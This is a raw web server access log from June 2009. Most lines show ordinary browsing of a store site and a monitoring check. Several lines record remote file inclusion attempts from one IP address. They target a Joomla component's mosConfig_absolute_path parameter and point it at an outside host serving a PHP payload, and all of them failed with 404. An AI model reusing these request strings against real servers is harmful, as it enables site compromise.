125.215.230.18 - - [10/Jun/2009:00:06:47 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):bone mill" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
125.215.230.18 - - [10/Jun/2009:00:06:47 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):bone mill" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
125.215.230.18 - - [10/Jun/2009:00:06:48 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):bone mill" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
125.215.230.18 - - [10/Jun/2009:00:06:48 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):bone mill" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [10/Jun/2009:00:06:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.215.230.18 - - [10/Jun/2009:00:07:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L008F20493202C4004FCE061+M37+ENG HTTP/1.1" 200 45605 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):bone mill" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.106.67.146 - - [10/Jun/2009:00:07:20 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:20 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:20 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:20 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:25 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:25 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:25 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:07:41 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
